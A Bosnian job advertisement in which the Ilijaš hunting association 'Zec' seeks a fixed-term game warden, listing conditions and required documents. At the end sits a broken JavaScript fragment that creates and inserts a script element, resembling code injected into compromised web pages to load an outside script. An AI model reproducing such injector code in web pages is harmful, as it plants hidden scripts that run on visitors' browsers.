Lovačko društvo “Zec” raspisuje oglas za prijem lovočuvara

Udruženje Lovačko društvo “Zec” Ilijaš raspisalo je oglas za prijem u radni odnos Lovočuvara u lovišt “Paljevo” Ilijaš na određeno radno vrijeme.

Lovočuvar će obavljati poslove i radne zadatke predviđene Zakonom o lovstvu FBiH i aktima Udruženja,a imenuje se na određeno vrijeme na period od tri mjeseca sa mogućnošću produženja.

Uslovi:  da su državljani BiH, da su stariji od 18 godina,  da su zdravstveno sposobni da obavljaju posao za  koji se kandidiraju, da se protiv njih ne vodi krivični postupak, te da ispunjavaju odgovarajuće i stručne kriterije

Pored općih, kandidati moraju ispunjavati i posebne uslove predviđene usvojenim aktima Udruženja koji su zasnovani na odredbama Zakona o lovstvu,a to su:  završen najmanje III stepen srednje škole, zdravstveno sposoban za vršenje određenih poslova utvrđenih za to radno mjesto, položen lovački i lovočuvarski ispit, položen vozački ispit “B” ili “B” i “C” kategorije, kao i ostale uslove propisane zakonom.

Uz prijavu na oglas, kandidati su dužni dostaviti dokaze u originalnom primjerku ili ovjerene kopije o ispunjavanju kriterija ovog oglasa: biografiju sa precizno kratkim pregledom profesionalnih aktivnosti radnog iskustva, ovjeren prepis dokaza o stručnoj spremi, ovjerenu kopiju lične karte, ovjerenu kopiju vozačke dozvole, uvjerenje o sržavljanstvu, kontakt telefon, uvjerenje o zdravstvenoj sposobnosti (samo kandidat koji bude izabran i to po okončanju oglasne procedure a prije zasnivanja radnog odnosa), ostale dokumente kao dokaz o ispunjavanju općih i posebnih uslova oglasa.

Izbor kandidata komisija će vršiti uz procjenu općih i posebnih uslova  i bodovanjem prema usvojenim kriterijima koje propisuje Upravni odbor Udruženja. Pri izboru prednost imaju kandidati koji se nalaze na spisku nezaposlenih Službe za zapošljavanje.

Nepotpune i neblagovremen prijave neće se uzimati u razmatranje. Oglas ostaje otvoren 30 dana od dana objavljivanja. prijave na oglas slati na adresu: ULD “ZEC” Ilijaš, Bosanski put br.3., 71380 Ilijaš.

 document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);